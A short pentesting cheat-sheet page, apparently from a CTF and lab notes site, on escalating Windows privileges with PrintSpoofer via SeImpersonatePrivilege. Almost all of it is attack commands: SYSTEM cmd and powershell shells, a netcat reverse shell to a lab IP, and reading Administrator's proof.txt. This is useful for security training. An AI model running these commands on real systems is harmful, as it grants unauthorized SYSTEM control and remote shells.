>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / PrintSpoofer (SeImpersonatePrivilege)

PrintSpoofer (SeImpersonatePrivilege)

Privilege Escalation Windows Tokens windows

Verify the privilege

whoami /priv

Look for SeImpersonatePrivilege Enabled.

Interactive shell

.\PrintSpoofer64.exe -i -c cmd
.\PrintSpoofer64.exe -i -c powershell

Reverse shell

.\PrintSpoofer64.exe -c "c:\Tasks\nc.exe 192.168.119.199 443 -e cmd"

Read a protected file

PrintSpoofer.exe -c "cmd /c type c:\users\Administrator\Desktop\proof.txt"

Reference

https://github.com/itm4n/PrintSpoofer